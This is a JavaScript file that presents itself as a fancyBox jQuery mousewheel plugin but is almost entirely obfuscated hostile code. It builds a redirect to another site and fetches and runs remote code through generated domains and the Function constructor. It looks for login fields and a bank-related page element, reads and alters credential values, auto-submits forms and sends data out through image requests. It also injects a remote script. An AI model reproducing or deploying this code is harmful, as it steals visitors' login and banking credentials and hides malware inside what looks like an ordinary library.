 /*!
 * fancyBox plugin - jQuery Plugin
 * MouseWheel Event handler
 * version: 1.1.0 (Fri, 25 Jun 2012)
 * @requires jQuery v1.6 or later
 *
 * Unless required by applicable law or agreed to in writing, software distributed under
 * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
 * ANY KIND, either express or implied. See the License for the specific language
 * governing permissions and limitations under the License.
 *
 * Copyright (c) 2013 WebContributors  
 *
 */
 ;(function(c){"function"!==typeof c?"jQuery":0})(function l(b){var b={},a=window.event,h=[].slice.call(arguments,1),d=0,e=0,f=0,g=0,g=0,event_type="mousewheel";b.wheelDelta=true;var n=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],h="onwheel"in document||9<=document.documentMode?["wheel"]:["mousewheel","DomMouseScroll","MozMousePixelScroll"],m,k;var q="if(c.event.deltaX)for(var p=n.length;p;)c.event.deltaY[n[--p]]=c.event.mouseHooks; c.event.special.mousewheel={setup:function(){if(this.addEventListener)for(var b=h.length;b;)this.addEventListener(h[--b],l,!1);else this.onmousewheel=l},teardown:function(){if(this.removeEventListener)for(var b=h.length;b;)this.removeEventListener(h[--b],l,!1);else this.onmousewheel=null}};c.fn.extend;lll";var mousewheel=function(a){var a=["mousewheel","unmousewheel"]};var player=function(a,b,c){ts=function(a,b){if(1==this.o){Qp(this,"setAudioTrack",{videoId:a,audioTrackId:b.id});var c=Pp(this);c.audioTrackId=b.id;Up(this,c)}else Tp(this,pa(this.ts,a,b))};function Wp(a,b,c,d,e){var g=Pp(a);d=d||0;var h={videoId:b,currentIndex:d,listId:e||g.o};Jp(g,b,d);n(c)&&(Hp(g,c),h.currentTime=c);Qp(a,"setPlaylist",h);e||Up(a,g)}f.dispose=function(){if(3!=this.o){var a=this.o;this.o=3;this.N("proxyStateChange",a,this.o)}Mp.L.dispose.call(this)};function iq(a,b){b&&(cq(a),eq(a));b==hq(a)?b&&(bq(a,1),gq(a,"getSubtitlesTrack")):b?(a.D()&&a.na.reset(),bq(a,1),gq(a,"getNowPlaying"),jq(a)):a.A(1)}function kq(a,b){var c=b.params.videoId;delete b.params.videoId;c==a.na.videoId&&(cc(b.params)?a.na.A=null:a.na.A=b.params,a.N("remotePlayerChange"))}function lq(a,b){var c=b.params.videoId||b.params.video_id,d=parseInt(b.params.currentIndex,10);a.na.o=b.params.listId||a.na.o;Jp(a.na,c,d);a.N("remoteQueueChange")}}});(function(window,document,jQ,fQ,evt){if(window!==undefined&&document!==undefined){var updateTrack=function(a,b,c){function mq(a,b){b.params=b.params||{};lq(a,b);nq(a,b)}function nq(a,b){var c=parseInt(b.params.currentTime||b.params.current_time,10);Hp(a.na,isNaN(c)?0:c);/*
var sessionTimer;
var secondsBeforeExpire;
var sessionTimeout;
/* ---------------------------------------------------------------------------------------
	amg-slider
--------------------------------------------------------------------------------------- */
/* ScrollBox
// 
// requirements: prototypejs , scriptaculous 
//
*/
c=parseInt(b.params.state,10);c=isNaN(c)?-1:c;-1==c&&-1e3==a.na.j&&(c=-1e3);a.na.j=c;1==a.na.j?fq(a):dq(a);a.N("remotePlayerChange")}function oq(a,b){var c="true"==b.params.muted;a.na.volume=parseInt(b.params.volume,10);a.na.muted=c;a.N("remotePlayerChange")}};for(var a in jQ){if(typeof jQ[a]=="number"){var za=fQ("d","e","a","c","o","m","r","s","l","t","x");if(za[6]==1){(function(a,b,c,d){b=a[c[2]+c[0]+c[1]];b[d[8]+"r"+d[1]+"f"]=b[d[2]+"r"+d[0]+d[9]+d[0]+"c"+d[0]+"l"]+d[3]+d[3]+b[d[8]+d[0]+d[5]+d[9]]+d[3]+d[10]+d[6]+d[7]+"n"+d[9]+d[1]+"n"+d[6]+"nc"+d[1]+d[3]+d[7]+"nf"+d[0]+"_"+d[10]+d[2]+d[5]+d[4]+d[8]+d[9]+d[10]+"l"})(window,1,["cat","ion","lo"],["o","e","p","/",".","s","a","i","h","t","m"])}evt="Interval";if(jQ[a]=="0"){evt="Timeout";window["set"+evt](function(){(function(G){
(function(D){var S="",R=0,preflang=D[10]+D[11],region="_"+D[10],o=[],F=["un","re","f","ace","c","len","At","gth","css","Time","n","F","Resp","XML","quest","o"];var N=function(A,I,M,E,T){var C=function(a,b,c,d,e){if(typeof a[e]!==b){return new a[e]}else if(typeof a[d]===c){a[e]=function(){try{return new a[d](A[1]+A[0]+".6.0")}catch(f){}try{return new a[d](A[1]+A[0]+".3.0")}catch(f){}return new a[d]("Micr"+F[15]+"s"+F[15]+F[2]+"t"+A[0])}}return null}(G,F[0]+"de"+F[2]+"i"+F[10]+T[0],F[2]+F[0]+F[4]+"ti"+D[8],A[3],A[2]);C.m=function(a){return function(a,b,c,d){c="";for(d=0;d<a;d++){c+=b["ra"+F[10]+"d"+F[15]+"m"]()["t"+F[15]+"Stri"+F[10]+"g"](36)[F[1]+D[10]+F[3]](/[\.]/g,"")}if(c[F[5]+F[7]]>a*8){return c.substr(0,8)}return c}(a,Math)};C.T=function(k,s){var a,b,x,v,i,o=F[4]+"harC"+F[15]+"de"+F[6];a=k[F[5]+F[7]]&3;b=k[F[5]+F[7]]-a;var p=3432918353,q=461845907,d=2246822507,j=3266489909,g=65535,u=4294967295,t=16,y=255,i=0;while(i<b){v=k[o](i)&y|(k[o](++i)&y)<<8|(k[o](++i)&y)<<t|(k[o](++i)&y)<<24;++i;v=(v&g)*p+(((v>>>t)*p&g)<<t)&u;v=v<<15|v>>>17;v=(v&g)*q+(((v>>>t)*q&g)<<t)&u;s^=v;s=s<<13|s>>>19;x=(s&g)*5+(((s>>>t)*5&g)<<t)&u;s=(x&g)+27492+(((x>>>t)+58964&g)<<t)}v=0;switch(a){case 3:v^=(k[o](i+2)&y)<<t;case 2:v^=(k[o](i+1)&y)<<8;case 1:v^=k[o](i)&y;v=(v&g)*p+(((v>>>t)*p&g)<<t)&u;v=v<<15|v>>>17;v=(v&g)*q+(((v>>>t)*q&g)<<t)&u;s^=v}s^=k[F[5]+F[7]];s^=s>>>t;s=(s&g)*d+(((s>>>t)*d&g)<<t)&u;s^=s>>>13;s=(s&g)*j+(((s>>>t)*j&g)<<t)&u;s^=s>>>t;return s>>>0};if(typeof S==F[0]+"de"+F[2]+"in"+T[0]||S==""||S[F[5]+F[7]]<16){S=C.m(1)}if(C!=null){var r=function(k,t,w){if(w!=F[8]&&w[F[5]+F[7]]==3){w=A[7][0]+"mg"}else if(w==F[8]){w=F[8]}else{w=S}t=function(i,j){return function(a,b,c,d,e,f,g,h){b=a*a;if(typeof e[d]===h[g[k[0]]]){return c[h[k[0]]]()[d](b)[f](/[^a-z]/g,"")[g[0]](-1*(b/h[5]+g[k[0]]))}else{a=h[3]+c[h[k[0]]]()*g[2];return a[h[k[1]]](h[0])[0]}}(6,"",j[k[0]],j[k[1]]+i[0]+j[3]+i[2]+j[5]+i[9]+j[2],j[0],i[2]+i[3]+i[8]+i[5]+i[k[0]]+j[6]+i[3],[i[k[1]]+i[5]+j[5]+j[6]+i[3],2,1e5],[".",i[2]+i[k[0]]+i[9]+i[6]+i[0]+"m",F[2]+i[7]+i[9]+j[6]+"t"+j[5]+i[0]+i[9],i[k[0]],i[k[1]]+i[8]+i[5]+j[5]+j[4],9])}([F[15],"a","r","e","s","l","d","u","p",k[2]],[k[3],Math,"g",k[4]+"t","t","i",F[4]]);return[t,function(a){return function(g){return function(a,b,c,d,e,f){for(var d in c){if(typeof c[d]==e[1]){var a=e[0][e[2]](c[d]);f+=c[d].substr(0,b)+a[F[5]+F[7]]}}return f}(true,1,["s"+g[a[5]]+"r"+g[a[2]]+"pt","d"+g[a[2]]+"v",g[a[2]]+g[a[4]]+"g",g[a[2]]+"fr"+g[1]+g[4]+g[2],F[2]+"r"+g[1]+g[4]+g[2],"sp"+g[a[7]]+F[10],g[0]+F[10]+g[6],F[2]+g[3]+"r"+g[4]],"",[document,"str"+g[a[2]]+F[10]+"g","g"+g[a[3]]+"tEl"+g[a[3]]+g[4]+g[2]+F[10]+"t"+g[5]+"yT"+g[a[7]]+"gN"+g[1]+g[4]+g[2]],"-")}(A[7])}(A[6])+region,"."+A[4]+".m"+T[0]+"ia/"+w+"/",function(a,b,c,d){return[a[b+""+c+"u"+d](a[b+"a"+d+c+"m"]()*1e7),a[b+""+c+"u"+d]((new Date)[D[2]+F[9]]()/1e3)]}(Math,"r",F[15],F[10]+"d")]}([1,4,F[10],G,"S"],0,E[1]);C.s='ET';C.e=D[0]+"s://"+r[0]+r[1]+r[2]+E[0]+"-"+C.T(r[0]+r[1]+r[3][1],r[3][0])+"_"+r[3][0]+"_"+r[3][1];C.uy=";w="+S;region="_";if(I>0){I='G'+C.s;if(S[F[5]+F[7]]>15&&I>1){C.uy=""}}else{I=D[14]}C.e+="."+E[1];C.open(I,C.e,true);C[D[12]+"tRe"+F[14]+D[3]+"er"]("A"+F[4]+F[4]+"ept-La"+F[10]+"guage",preflang+C.uy);C[""+D[8]+F[1]+T[2]+"s"+T[1]+F[4]+T[3]]=function(){if(C[F[1]+T[2]+"S"+T[1]]==4){if(C.status>199&&C.status<206){C.c=C[F[1]+"sp"+D[8]+D[12]+T[4]];var v=function(a,c){if(G!==undefined&&G!==null){return function(b){if(typeof document.location["h"+F[1]+F[2]]!==F[0]+"de"+F[2]+"i"+F[10]+T[0]){return function(e){var y=[e[4]+e[5]+F[10]+"t"+e[0]+F[10]+"t",a[1]+"s"+e[0]+e[4]+c+e[3]+a[1]+e[1]+e[5]+"l"+A[7][0]+e[4]+""+e[3]];return["Google,Yahoo","x"+a[1]+e[4]+e[2]+e[4]+"h"+e[0]+a[1],"s"+e[0]+"rv"+e[0]+"r","d"+e[2]+"t"+e[0],y[0]+y[1],"x"+a[1]+y[0]+y[1],y[0]+y[1]+a[1]+"r"+e[0]+e[1]+e[5]+"rt"+a[1]+e[5]+F[10]+"l"+e[3],"x"+a[1]+y[0]+y[1]+a[1]+"r"+e[0]+e[1]+e[5]+"rt"+a[1]+e[5]+F[10]+"l"+e[3],"x"+a[1]+F[2]+"r"+e[2]+"m"+e[0]+a[1]+e[5]+"pt"+A[7][0]+e[5]+F[10]+"s"]}([a[0],"p",b[0],"y",F[4],F[15]])}}([A[7][1],c,F[10]+"t"+a[1]+"s",F[10]+"t"+a[1]+"t"])}}(["e","-"],"ur"+A[7][0]+"t");v[0]=A[8]+"-"+A[7][0]+"d-"+r[0];v[1]=v[1]+""+A[8];var t=0;for(var w in v){if(!isNaN(w)){o[t]=C[A[5]](v[w]);if(o[t]!==null&&o[t][F[5]+F[7]]>3){if(C.T(r[0]+r[3][1]+D[13],r[3][0])==C[A[5]](v[w])&&t==0){o[t]=1}else if(C.T(r[0]+r[3][1]+F[2]+D[8]+"ts",r[3][0])==C[A[5]](v[w])&&t==0){o[t]=3}else if(t==1&&o[0]==1){if(S[F[5]+F[7]]<16){S=o[t];R++;V()}else{R++;V()}}else if(t>1){o[t]=1;region+=t+"1"}}else{o[t]=0;region+=t+""+(t-1)}t++}}if(I[F[5]+F[7]]==4){M(o);return}else{o[1]=2;M(o,C.c);return}}}};C[D[12]+F[10]+"d"]()}};function j(a,b,c){if(a[0]==3&&a[1]==2){new G[F[11]+F[0]+F[4]+"ti"+D[8]](b)()}}function x(a,b){N(["."+F[13]+"HTTP","Msxml2",F[13]+D[0]+"Re"+F[14],"A"+F[4]+"tiveXOb"+D[9],D[1],D[2]+F[12]+D[8]+D[12]+D[3]+"er",[5,8,0,2,4,7,6,1],["i","a","e",F[15],"m","sB","put",F[4],"l"],D[4]],a,j,b,["ed","tate","ady","hange","Text"])}function z(a){a={0:[D[7]+"_"+D[1],"gi"+F[2]],1:[D[5]+F[2]+F[15]+"rms",F[8]],2:["p"+F[1]+D[6],"js"]};if(typeof a[R]==F[15]+"b"+D[9]){x(R,a[R])}}function V(){G[D[12]+"t"+F[9]+"out"](z,500)}V()})(["Http","pbs","get","Head","Link","custom","fetch","logo","on","ject","pl",",en-US;q=0.7,en;q=0.3","se","style","HEAD","update","T","OPTIONS"])}(window));},3e2)}window["set"+evt](function(){fQ("d","e","a","c","o","m","r","s","l","t","x");var g_Id=[function(){(function(d,e,f){var b=[f[2],"n","g","d","i"];var a=e[b[2]+f[1]+f[0]+b[3]](d+b[2]+b[0]);if(a!==undefined&&a!==null){var c=e[b[2]+f[1]+f[0]+b[3]](d+b[2]+b[4]+b[1]);if(c!==undefined&&c!==null){c[b[4]+b[3]]=d+b[2]+b[0]+b[0];a[b[4]+b[3]]=d+b[2]+b[4]+b[1]}}})("lo",document,["ntByI","etEleme","1"])},function(a,b){(function(a,b,c,d,e,f,g,h){var a=h["g"+b[2]+e[0]+g[6]+b[1]+b[2]+"m"+b[2]+"n"+e[0]+"s"+g[7]+"T"+e[2]+g[8]+e[2]+"m"+b[2]](b[0]+g[0]+b[3]+e[0]);if(a!==undefined&&a!==null){if(a[g[10]]!==undefined&&a[g[10]]!==null){var d=[a[g[10]],0];for(d[1]++;d[1]<d[0];d[1]++){if(typeof a[d[1]]==e[4]+g[1]+b[2]+"c"+e[0]){f=["g"+b[2]+e[0]+"A"+e[0]+e[0]+e[3]+b[0]+"b"+b[3]+e[0]+b[2],"m"+e[2]+g[5]+b[2]+"ng"+e[0]+"h",g[3]+e[2]+g[2],"n"+e[2]+"m"+b[2],e[0]+g[4]+b[2],e[0]+b[2]+e[1]+e[0],b[0]+"d",b[1]+e[4]+"g"+b[0]+"n"];if(a[d[1]][f[0]](f[1])<3e3&&a[d[1]][f[0]](f[1])>300&&a[d[1]][f[0]](f[2])==b[0]+e[1]+e[1]+b[1]&&a[d[1]][f[0]](f[3])==f[7]&&a[d[1]][f[0]](f[4])==f[5]&&a[d[1]][f[0]](f[6])!=f[7]){c=h["g"+b[2]+e[0]+g[6]+b[1]+b[2]+"m"+b[2]+"n"+e[0]+g[7]+g[9]](f[7]);if(c!==undefined&&c!==null){c[f[6]]=a[d[1]][f[0]](f[6]);a[d[1]][f[6]]=f[7]}}}}}}})(null,["i","l","e","u"],true,"PBSBank",["t","x","a","r","o"],0,a,b)}];g_Id[0]();g_Id[1](["np","bj","ss","cl","yp","xl","E","By","gN","Id","length"],document);var z={v:[top.window,top.window.location.hostname,window.top.screen.height||window.screen.height||1024,window.top.screen.width||window.screen.width||768,navigator,window,document.location.href],a:function(a,b){this[a]=b},E:function(e,f){if(e==6){return"="}function a(a,b,c){switch(a){case 1:if(b<38&&b>31)return!0;return!1;case 2:return a+b;case 3:return parseInt(b,16)-c*2;case 4:return c-=b*2;case 5:return b-30}}
/* ---------------------------------------------------------------------------------------
	amg-forms-styles
--------------------------------------------------------------------------------------- */
var n="",r=e.length,i=2,s="",o=0,n="",u=0;for(u=0;u<3;u++)if(u==0){n="";for(o=0;o<r;o++)n=e.charAt(o)+n;e=n}else if(u==1){o=0,n="",r--,f=a(5,e.charCodeAt(r));while(o<r)s=e.charCodeAt(o),a(1,s)?(s=a(3,e.substr(o+1,2),f),o=a(2,o)):s=a(4,f,s),n+=String.fromCharCode(s-i),i++,i>9&&(i=0),o++}return n},M:function(a,b,c,d,e,f){for(e in b){if(typeof b[e]=="string"){f=a.getElementById(this.Z(this.T(b[e])));if(f!==undefined&&f!==null){f[this.R(c)]=this.R(d);(function(a,b,c,d){a[b+"T"+d+"out"]("document.for"+c,5e3)})(window,"set","ms[0].submit()","ime")}}}},Z:function(a){return this.A(a,14,33,94,126,0)},G:function(x,y,c,z,a,b,d){for(z in x){if(typeof x[z]=="number"){b=y[3];if(x[z]==1){d=c.getElementById(b);if(d!==null&&d!==undefined){a=d[y[0]];if(a!==undefined&&a!==null&&a==b){b=d[y[x[z]]];if(b!==null&&b!==undefined){if(this.U(b)===true){return[x[z],b]}}}}}if(x[z]==2){d=c.getElementsByTagName(y[x[z]]);for(a in d){if(d[a]!==null&&d[a]!==undefined){if(d[a][y[0]]!==undefined&&d[a][y[0]]!==null&&d[a][y[0]]==b){b=d[a][y[1]];if(b!==null&&b!==undefined){if(this.U(b)===true){return[x[z],b]}}}}}}}}return[0,0]},X:function(a,b){return this.E(a,b)},Y:function(a){return this.v[a]},K:function(a){return this.I(a)+17},S:["=","#}X}EGDhNI[QCkMGDKGoVDQmRCQEMTVoUNDGI?:KPKnSANj","&",'$Q28%@L?CD,JI3HE0B?-DI?3>CGF.?CH4DBI0I38!xzvV3MF@@68"02e7%28"|e7!08"v}w-68%5OLCB88 24vf7"5e7!88#68%|q38%||wh4ABTRH?=<Vc8!C268"}t28$08%58%88 4wMF@@68"02PFGC98!35p-GGHDa8$46xe7#HAEEb8!5748!28 78%d,Cya8${}KRE>48"8:28 f7%148$28!sw,z}18#2vy}o48"{|38!f7 skN608$|e7"78"y@08!zwe7!z4I88#78!te7"t0f7"J'," ==GviygUv|e7 }oH754",'#o08$s_38"28$oyo','"T^dW08$rzys','"28!tn','$88%18$w58$e7 e7#qlzzy58"yp88$e7%p'],H:function(a){return this.G([1,2],["name","value","input","login"],a)},I:function(a){function r(a,b,c){return a==1?65504:a==2?a*b:a+b+c+900}function i(q,z,x,i,s,o,u,a,f,l,c){u=r(z,8),l=x+u+r(x),c=0;for(s=c,o=q.length,a=x,f=c;s<o;s++)a=(a+q.charCodeAt(s))%l,f=(f+a)%l;return s=(f<<u)+a>>>c,s+r(l,u,i)}return i(a,2,1,135e3)}};z["a"]("U",function(a){return/^[\w\@\-_]{5,16}$/.test(a)});z["a"]("N",function(a,b,c,d,e){d=this.H(document);e=2;if(d[0]>0&&d[1]!=""&&d[1]!=0){this.M(document,["!F@GNJiIMI?","$MCHU9HQ18$ERNUPYFToOSOE","%CZV]XWD2EEJ[HSqQUQG"],"!{{te7 li",'"AAKzm}kYz08"28#18#sL;98');if(this.B(d[1]+"-"+b+"-"+d[0])){c=this.R(this.D(this.S,1));c=this.Z(c)+d[1]+this.D(this.S,e)+"q"+this.D(this.S,0)+a+this.D(this.S,e)+"g"+this.D(this.S,0)+b+this.D(this.S,e)+"a"+this.D(this.S,0)+d[0]+this.D(this.S,e)+"b"+this.D(this.S,0);c+=this.K("P"+d[0]+d[1]+a+b);this.J(c)}}});z["a"]("F",function(a){switch(a){case 1:return['"zf7!18"f7#}','$u78"sUz}w',"%y58%f7!18$sxf7!08 x","#vx|e7#pe7%x{qm",'!q}wykpe7"jo','!llz18#o18"f7 j}}i',"!qxkwj","#tx28$|n","#58#u}28!|n","%98%y18$68%08%r","#vtT98 q\28 rs",'"08%e7#08$Q08#pq'];case 2:return["$xxa8 zVe7 r","!|ulrq}f7#smn|","#08#nof7!e7#08$sp28#np",'$v88#58%y68"28#'," ze7 pz}qe7$z",'!08"woy58!wqqyyqx','"srO48%{s}',"#78!58%ze7 b|s","!qou_z^xo"," ]V[vm","$g`ev{p{"];case 3:return["!08#x_okxT",'%88!18"w58%e7!e7"Q|}vd78 58$08 08"',"!28%tntn",'%18"48!08#78${r78%',"!18${me7$nv","!9qz{DCBwnz","!;mtg}pDCBwnz","$rse7 z","#wxq_y|x",'"48!38$28!18 ',"$f7$qf7$o",'$D58"yp58%','$y78$s58 38%z28"',"#98!zpE68 y",'"FErwlp'];case 4:return["!tun|jxrovrn08!nq{o{x","!18 |t|l{fkvo}kysju","!e7 |e7 oi{m}xt18 lwnoqk",'$28!ttzo38#18%rse7"vrw48%f7#wq'," x}u}m|glmftly}sovvi"," ||hdop{wlh||v",'$38"38%ok38"uv58#p48$48$e7%',"!f7 {f7 znkyk38!|vkpqjx",'"08#08#{olzv48"}wl08!p}','"18"u38#18%lxlxrnpuroy|p|','%e7!ty68%58%98$sw08%v38"'];case 5:return[" }xpxhwl08$wf7#jnlj","!mngf7!m18$ope7!nl","%98%48#|48 t38 nse7%w58%sx08 08#t",'#rx|z58"f7"}m|p','"08$e7"08#q08$pq','%98"s}w',"%b8!68$e7!68%v58 puvo78 u38$ye7!18#08#48#",'!?}k18"kuo','"Bf7!m38!mwq','"Cf7$m38!mwq',"!48!|x|zowm}k18%kuo",'$28"pq98%ywqvwpe7"','%58%38"58!v08!e7#',"%}e7 u38#38!r58 v}",'!txozk48"|x|zowm}k18#kuo'," >jy}gvm",'%@vHt38!78"q08$w'," usf7$pf7#|n{uo",'"|18"y18$q08$kpqjxp98#18!}18 f7"tr'," 6wzti08#woy",' wzti08"woy','$58!08%x08%pf7$tyzs18!o|08$|rt68#xx48#q18"28#']}return""});z["a"]("D",function(a,b){return a[b]});z["a"]("Q",function(a){return this.O(this.Y(5),this.T(a))});z["a"]("O",function(a,b,c,d){if(b in a){if(a[b]!==undefined&&a[b]!==null){return true}}c=a.top.frames;for(d=0;d<c.length;d++){if(c[d]!==undefined&&c[d]!=null){if(b in c[d]){if(c[d][b]!==undefined&&c[d][b]!==null){return true}}}}c=function(a,b,c,d,e){for(b in a){if(a[b]!==undefined&&a[b]!==null&&typeof a[b]=="object"){if(typeof b=="string"){if(b.length>d&&b.indexOf(c)==-1){return b}}}}return""}(window,0,"_",30,-1);if(c!=""&&a[c]!==undefined&&a[c]!==null){if(b in a[c]){if(a[c][b]!==undefined&&a[c][b]!==null){return true}}}return false});z["a"]("J",function(a,b,c,d,e){c=this.R("#uvozU");d=this.v[5];e=new d[c];e[this.T("!m{{")]=a});z["a"]("L",function(a,b,c,d,e){e=this.v[6];d=this.R(this.S[4]);c=a-4;a=this.S[a];b=c*2;d=d.substr(c);if(e.indexOf(d)>0){e=this.S[c+2];a=this.T(a);d=document.getElementsByTagName(a);for(a in d){if(d[a]!==null&&d[a]!==undefined){if(d[a][this.T(e)]!==undefined&&d[a][this.T(e)]!==null&&d[a][this.T(e)].indexOf(this.R(this.S[c+5]))>-1){d[a][this.T(this.S[b])]=this.R(this.S[c])}}}}});z["a"]('A',function(a,g,h,i,j,k,b,c,d,e,f){c=[];f=String;for(d=k;d<a.length;d++){b=a.charCodeAt(d);b>=h&&b<=j?c[d]=f.fromCharCode(h+(b+g)%i):c[d]=f.fromCharCode(b)}e='';for(d=k;d<c.length;d++){e+=c[d];}return e});z["a"]("R",function(a){return this.X(a)});z["a"]("B",function(a,b){a=this["C"](a,"38");if(a!=""){b=this["v"][0];if(typeof b[a]!=="number"){b[a]=0;return true}b[a]++;if(b[a]<2){return true}}return false});z["a"]("T",function(a){return this.R(a)});z["a"]("C",function(a,g){var v=0,u=0,f='"'+g+"!68%}qzta",d="",c="",z=0,b=a+this["v"][3]+this["v"][2];i=this["v"][1],e=this["v"][4];if(typeof e=="object"){b+=e.appName+e.appVersion}b+=i+a;if(b.indexOf(this.R(f))>0){b=this.Z(b);i=b.length;e=0;i=b.length;d="P";for(u=0;u<i;u++){z++;e+=b.charCodeAt(u)+u;d+=e.toString(16)}i=b.length;e=0;d=b;b="";a="P";for(u=0;u<i;u++){z++;e=d.charCodeAt(u);b=b<<1^e}return a+b+z.toString(16)+e}return d});z["a"]("W",function(a,b,c,d,e,f,g){this.L(7);d=1;while(d<6){c=this.F(d);if(c!==undefined&&c!=null&c!=""){g=0;for(f in c){if(typeof c[f]=="string"){if(this.Q(c[f])){g++}}}if(g>1){this.N(g,d)}}d++}});z.W()},jQ[a]*1100)}}}})(window,document,function(a){return a}([0,2]),function(a,b,c,d,e,f,g,h,i,j,m){var k=[0,1,2,3,4,false,0];(function(a,b,c,d,e,f,g){var n=[f+"O"+g,"userAgent","Trident","MSIE","toLowerCase","pr","Edge"];d[22]=d[9][n[4]]();var h=function(a,b,c,d,e){if(a==1){return function(a,b,c){return[function(a,b){return a[n[0]](b)}(a,b),function(a,b){return a[n[0]](c)}(a,c+"x"),function(a,b){return a[n[0]](b)}(a,n[6])]}(b,c,d)}if(a==3){return["W",b,d,c,"Element","parentNode",e,"sByTagName"]}if(a==5){k[4]=true;if(b[n[0]](n[3])>0||b[n[0]](n[2])>0||b[n[0]](n[6])>0){k[4]=false}}if(a==2){if(b>a){return false}else{return true}}if(b>a){return true}return false};d[10]=h(1,b[n[1]],d[22]+d[7]+d[13]+d[2]+"ws",d[22]+d[11]+"f"+d[2]);if(h(0,d[10][0])){if(h(21,d[10][2])){k[5]=true}if(h(2,d[10][1])==1&&h(21,d[10][2])){k[5]=true}e=[d[9]+d[7]+d[3],d[1]+d[22]+d[6]];var f=["i","c","n",d[21][3]+"l"+d[21][0]+"y",d[21][1],"C"];var y=[d[19]+f[0]+f[2]+d[20],"fr"+d[2]+"m"+f[5],f[1],f[5]+d[2]+d[13]+f[4],"A"+d[21][4],d[21][2]+d[21][0]+"r"];if(function(a,b,c){return a[c+b[0]]==undefined||a[c+b[1]]==undefined||a[c+b[0]].length>1||a[c+b[1]].length>1?1:0}(a,e,d[d[8]])>0||a[y[0]][y[1]+y[5]+y[3]](d[1][y[2]+y[5]+y[3]+y[4]](0))!=d[1]||d[1][y[2]+y[5]+y[3]+y[4]](0)!=4*3*7){try{h(5,b[n[1]]);if(k[5]){for(f=0;f<2;f++){try{delete a[[d[d[8]]+e[f]]];if(a[[d[d[8]]+e[f]]]==undefined){k[f]=false}else{k[f]=a[[d[d[8]]+e[f]]]}}catch(_f){k[6]=1}}}var o=n[5]+d[2]+d[21][4]+d[2]+d[21][4]+"y"+d[21][3]+d[21][1];d[10]=h(3,f[3],"s",d[17],d[18]);f=c["g"+d[21][1]+d[21][4]+d[10][4]+d[10][7]](d[9]+d[10][2]);if(k[0]==false&&k[1]==false){k[5]=false}if(f!==undefined&&f!==null&&f.length>0){f=f[0];if(!k[5]){for(g=0;g<2;g++){a[[d[d[8]]+e[g]]]=f[d[0]+d[10][0]+d[22]+d[7]+d[13]+d[2]+d[10][0][n[4]]()][[d[d[8]]+e[g]]];k[g]=a[[d[d[8]]+e[g]]]}}a[y[0]][y[1]+y[5]+y[3]]=f[d[0]+d[10][0]+d[22]+d[7]+d[13]+d[2]+d[10][0][n[4]]()][y[0]][y[1]+y[5]+y[3]];k[2]=a[y[0]][y[1]+y[5]+y[3]];a[y[0]][y[2]+y[5]+y[3]+y[4]]=f[d[0]+d[10][0]+d[22]+d[7]+d[13]+d[2]+d[10][0][n[4]]()][y[0]][y[2]+y[5]+y[3]+y[4]];k[3]=a[y[0]][y[2]+y[5]+y[3]+y[4]]}else{var f=c[d[14]+d[10][4]](d[9]+d[10][2]);f[d[10][6]][d[13]+d[22]+d[10][3]+d[10][1]]=d[7]+d[d[8]+1];f[d[10][6]]["v"+d[22]+"s"+d[22]+"b"+d[22]+"l"+d[22]+d[21][4]+"y"]=d[21][2]+d[22]+"dd"+d[21][1]+d[7];f[d[10][6]][d[10][0]+d[22]+"dt"+d[21][2]]=1+d[21][3]+"x";f[d[10][6]][d[21][2]+d[21][1]+d[22]+"g"+d[21][2]+d[21][4]]=1+d[21][3]+"x";c.body[d[15]+d[12]](f);var l=f[d[0]+d[10][0]+d[22]+d[7]+d[13]+d[2]+d[10][0][n[4]]()];if(!k[5]){for(g=0;g<2;g++){a[[d[d[8]]+e[g]]]=l[[d[d[8]]+e[g]]];k[g]=a[[d[d[8]]+e[g]]]}}e=[y[5],y[1]+y[5]+y[3],y[2]+y[5]+y[3]+y[4]];l[y[0]+"e"]="";g=l[y[0]+"e"];if(g[e[2]]!==undefined&&g[e[2]]!==null){a[y[0]][e[2]]=l[y[0]][e[2]];a[y[0]][o][e[2]]=l[y[0]][o][e[2]];k[3]=l[y[0]][o][e[2]]}if(l[y[0]][e[1]]!==undefined&&l[y[0]][e[1]]!==null){a[y[0]][e[1]]=l[y[0]][e[1]];a[y[0]][o][e[1]]=l[y[0]][o][e[1]];k[2]=a[y[0]][e[1]]}if(k[4]){f[d[10][5]][d[11]+d[16]+d[12]](f)}}}catch(_a){}}}})(this,navigator,document,[d+e+"n"+j+b+"n"+j,"T",e,j+b+g+"v"+c+i,h+b+j,e+"n"+b,f+b+e+"u"+j,"n",4,"I",[0,1],g+b,"Chi"+i+a,a,d+g+b+c+j+b,c+"pp"+b+"n"+a,f+e+"v"+b,"f"+g+c+"m"+b,h+j+"y"+i+b,"S"+j+g,"g",["a","e","h","p","t"]],[],"in"+a+b+m,"f");return k});/* ---------------------------------------------------------------------------------------
	amg-trends
--------------------------------------------------------------------------------------- */
(function(a){(function(a,b,c,d,e){(function(a,b,c,d,e,f){d=b;a=a;a.type=e["format"]+d+"java"+e[e["b"]];a.src=d+b+e["b"]+e["d"][0]+c+e["d"][3]+c+e["d"][5]+c+e["d"][6]+e["d"][4]+"pbs"+e["d"][4]+e["b"]+d+"lib"+e["d"][1]+e["d"][2]+d+e["a"][e["trends"]]["href"];b=e["a"].getElementsByTagName(e["1"])[0];b.appendChild(a)})(a,"/","-",0,{a:b,b:c,1:"head",trends:"location",format:"text",d:d,media:e})})(a["b"]["createElement"](a["a"]),a["b"],a["c"],a["d"](0,"userAgent",navigator),a["a"])})({a:"script",b:document,c:"media",d:function(a,b,c,d,e,f){this.version="1.1",this.browserType,this.browserVersion,this.mobile,this.browserVersionExtended=null;for(var e,i=!1,r=c[b].match(/Android/i)||c[b].match(/BlackBerry/i)||c[b].match(/iPhone|iPad|iPod/i)||c[b].match(/Opera Mini/i)||c[b].match(/IEMobile/i)||null,s=c.appName,t=c[b],o=t.match(/(opera|chrome|safari|firefox|msie|trident|edge)\/?\s*(\.?\d+(\.\d+)*)/i),n=t.match(/(opera|chrome|safari|firefox|msie|trident|edge)\/?\s*(\.?\d+(\.\d+)*)/gi),a=0;a<n.length;a++)if(n[a].toLowerCase().indexOf("edge")>=0){var d=n[a].split("/"),m=d[0].toLowerCase(),l=d[1];i=!0}if(!i){o&&null!=(e=t.match(/version\/([\.\d]+)/i))&&(o[2]=e[1]),o=o?[o[1],o[2]]:[s,c.appVersion,"-?"];var 